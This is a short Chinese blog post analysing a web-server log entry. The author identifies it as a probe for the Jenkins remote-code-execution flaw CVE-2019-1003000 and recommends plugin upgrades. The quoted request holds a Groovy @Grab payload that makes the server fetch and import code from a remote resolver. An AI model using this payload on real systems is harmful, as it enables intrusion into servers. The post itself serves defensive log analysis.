2024年1月11日 星期四

從 Web Log 學習系統漏洞 86

最近這個 IP(165.22.63.123)從年初到現在就不斷地企圖入侵:

很多沒看過的東西, 截下某一段來看看:
165.22.63.123 - - [11/Jan/2024:11:27:31 +0800] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)@GrabResolver(name='test', root='http://aaa')@Grab(group='package', module='vulntest', version='1')import Payload;  HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"

經估狗後得到這是一個 Jenkins遠端程式碼執行漏洞(CVE-2019-1003000), 使用者繞過沙盒保護在 Jenkins伺服器上執行任意程式碼, 解決方式是升級相關套件(Pipeline: Declarative, Pipeline: Groovy, Script Security)

沒有留言:

張貼留言